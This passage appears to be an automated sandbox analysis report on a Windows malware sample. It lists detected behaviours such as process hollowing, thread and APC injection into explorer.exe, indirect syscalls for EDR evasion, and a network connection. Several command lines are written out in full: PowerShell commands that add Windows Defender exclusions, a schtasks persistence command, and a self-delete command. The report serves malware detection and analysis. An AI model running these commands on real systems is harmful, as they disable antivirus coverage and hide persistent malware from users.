Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC6ACC mov eax, dword ptr fs:[00000030h]	9_2_01AC6ACC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC6ACC mov eax, dword ptr fs:[00000030h]	9_2_01AC6ACC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70AD0 mov eax, dword ptr fs:[00000030h]	9_2_01A70AD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA4AD0 mov eax, dword ptr fs:[00000030h]	9_2_01AA4AD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA4AD0 mov eax, dword ptr fs:[00000030h]	9_2_01AA4AD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9EA2E mov eax, dword ptr fs:[00000030h]	9_2_01A9EA2E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AACA24 mov eax, dword ptr fs:[00000030h]	9_2_01AACA24
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AACA38 mov eax, dword ptr fs:[00000030h]	9_2_01AACA38
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A94A35 mov eax, dword ptr fs:[00000030h]	9_2_01A94A35
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A94A35 mov eax, dword ptr fs:[00000030h]	9_2_01A94A35
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFCA11 mov eax, dword ptr fs:[00000030h]	9_2_01AFCA11
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AACA6F mov eax, dword ptr fs:[00000030h]	9_2_01AACA6F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AACA6F mov eax, dword ptr fs:[00000030h]	9_2_01AACA6F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AACA6F mov eax, dword ptr fs:[00000030h]	9_2_01AACA6F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1EA60 mov eax, dword ptr fs:[00000030h]	9_2_01B1EA60
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AECA72 mov eax, dword ptr fs:[00000030h]	9_2_01AECA72
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AECA72 mov eax, dword ptr fs:[00000030h]	9_2_01AECA72
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80A5B mov eax, dword ptr fs:[00000030h]	9_2_01A80A5B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80A5B mov eax, dword ptr fs:[00000030h]	9_2_01A80A5B

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: 13_2_003C6052 GetCommandLineW,GetModuleHandleW,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetLastError,FreeLibrary,GetLastError,GetCurrentProcessId,memset,CharNextW,lstrcmpiW,CharNextW,lstrcmpiW,CharNextW,CharNextW,lstrcmpiW,CharNextW,GetCurrentDirectoryW,CmFree,CmFree,CmFree,CmFree,FreeLibrary,CmFree,FreeLibrary,CmFree,FreeLibrary,CmFree,FreeLibrary,CmFree,CmMalloc,LoadStringW,LoadStringW,MessageBoxW,CmFree,GetCurrentProcessId,LoadStringW,LoadStringW,MessageBoxW,

13_2_003C6052

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003D1720 SetUnhandledExceptionFilter,		13_2_003D1720
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003D14D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		13_2_003D14D0

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 3.33.130.190 80

Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	NtClose: Indirect: 0x16EA56C
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	NtQueueApcThread: Indirect: 0x37DA4F2
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	NtQueueApcThread: Indirect: 0x15CA4F2
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	NtClose: Indirect: 0x15CA56C
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	NtClose: Indirect: 0x37DA56C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	NtQueueApcThread: Indirect: 0x16EA4F2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory written: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory written: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Thread register set: target process: 1028	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Thread register set: target process: 1028
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Thread register set: target process: 1028
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Thread register set: target process: 1028

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 3C0000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: AD0000

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: 13_2_003C8DB2 AllocateAndInitializeSid,GetModuleHandleA,LoadLibraryExA,GetProcAddress,FreeSid,FreeLibrary,

13_2_003C8DB2

Source: explorer.exe, 0000000A.00000002.4484431911.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094644679.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3102587400.0000000009C21000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 0000000A.00000000.2049193521.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4475269570.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000002.4477989060.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2049193521.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4475269570.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.2049193521.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4475269570.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.2049193521.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4475269570.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000002.4473768693.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2048449810.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Queries volume information: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
